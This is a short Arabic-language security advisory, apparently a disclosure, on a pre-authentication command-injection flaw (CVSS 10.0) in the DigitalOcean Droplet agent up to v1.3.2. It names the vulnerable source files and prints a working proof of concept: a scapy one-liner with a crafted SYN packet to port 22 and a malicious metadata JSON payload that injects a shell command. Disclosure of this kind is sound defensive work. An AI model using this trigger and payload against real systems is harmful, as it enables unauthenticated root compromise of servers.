
نقطة ضعف حرجة في RCE قبل المصادقة (CVSS 10.0) في وكيل DigitalOcean Droplet حتى الإصدار v1.3.2 عبر حقن الأوامر.
ثغرة RCE حرجة بدون مصادقة (CVSS 10.0) في وكيل DigitalOcean Droplet حتى الإصدار v1.3.2 عبر حقن الأوامر.
تم اكتشاف ثغرة حرجة في حقن الأوامر في وكيل DigitalOcean Droplet (جميع الإصدارات حتى 1.3.2). تسمح هذه الثغرة للمهاجم بتحقيق تنفيذ الأوامر عن بُعد (RCE) بصلاحيات الجذر دون أي مصادقة.
مكتشف الثغرة: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
توجد الثغرة في مكوّن معالجة استكشاف الأخطاء وإصلاحها:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goيقوم الوكيل بمعالجة البيانات الوصفية من الخدمة المحلية (169.254.169.254) وينفذ الأوامر من مصفوفة دون تنقية مناسبة.
TroubleshootingAgent.Requestingيتم تشغيل الوكيل عبر حزمة TCP محددة إلى المنفذ 22:
تشغيل الجلب:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
حمولة البيانات الوصفية الخبيثة:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
الأثر درجة CVSS: 10.0 (حرجة)
الصلاحيات المطلوبة: لا شيء
النتيجة: اختراق كامل للنظام (وصول الجذر)
